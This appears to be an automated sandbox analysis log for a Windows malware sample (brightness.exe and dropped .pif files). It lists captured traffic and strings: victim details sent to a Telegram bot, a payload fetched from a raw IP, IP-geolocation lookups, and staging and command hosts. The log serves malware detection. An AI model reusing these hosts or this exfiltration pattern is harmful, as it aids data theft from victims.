          Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET /albt.exe HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 147.124.216.113
          Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
          Source: global traffic DNS traffic detected: DNS query: amazonenviro.com
          Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
          Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global traffic DNS traffic detected: DNS query: api.telegram.org
          Source: global traffic DNS traffic detected: DNS query: mail.irco.com.sa
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:53:40 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:53:52 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:54:00 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drString found in binary or memory: http://ocsp.comodoca.com0$
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drString found in binary or memory: http://www.pmail.com0
          Source: npratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lenc
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.or
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: brightness.exe, 00000004.00000002.1853607956.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.00000000206C7000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.00000000206ED000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpncon4
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconi
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Nsltarpnconu
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B56000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20a
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: npratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enDzY#
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enLz
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: npratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.000000002095E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
